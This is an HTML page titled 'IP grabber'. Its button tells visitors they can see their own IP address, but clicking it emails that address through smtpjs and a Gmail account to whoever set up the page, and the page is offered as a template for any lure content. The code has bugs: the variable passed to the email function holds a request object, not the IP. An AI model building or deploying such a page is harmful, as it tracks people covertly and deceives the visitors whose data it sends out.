<!DOCTYPE html> 
<html> 
  
<head> 
  <title>IP grabber</title> 
  
  <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"> </script> 
  <script src= "https://smtpjs.com/v3/smtp.js"> </script> 

  <script>    
    function sendEmail(ip) 
    { 
      Email.send({ 
        Host: "smtp.gmail.com", 
        Username: "sender email address", 
        Password: "sender password", 
        To: 'reciver email address', 
        From: "sender email address", 
        Subject: "subject", 
        Body: ip,}) // there is the ip address of the client

        .then(function (message) { 
          $.getJSON("https://api.ipify.org?format=json", 
        function(data) {alert(data.ip);})
        }); 
    } 
  </script> // main script for grabbing the IP and sending it to an email address

  <style>
      #box { 
        width:360px;
        height:50px;
        background:rgb(75, 75, 75);
        color:white;
        font-size: 20px;
        margin:5px;
        border-radius:15px;
        -webkit-border-radius:5px;
        -o-transition-property:width,height,-o-transform,font-size,opacity;
        -o-transition-duration:1s,1s,1s,1s,1s,1s;
        -moz-transition-property:width,height,-o-transform,font-size,opacity;
        -moz-transition-duration:1s,1s,1s,1s,1s,1s;
        transition-property:width,height,transform,font-size,opacity;
        transition-duration:1s,1s,1s,1s,1s,1s;}

        
      #box:hover{
        opacity:1;
        background: rgb(75, 75, 75);
        width:550px;
        height:200x;
        font-size:30px;
        color:white;}
  </style>

</head> 
  

<body> 

        <h1> you can put here everything you want</h1>

        <script>var ip = $.getJSON("https://api.ipify.org?format=json", function(data) {return(data.ip);});</script>
        <input type="button" id = "box" value="click here to see your ip address!" onclick="sendEmail(ip)" />

</body> 
  
</html> 
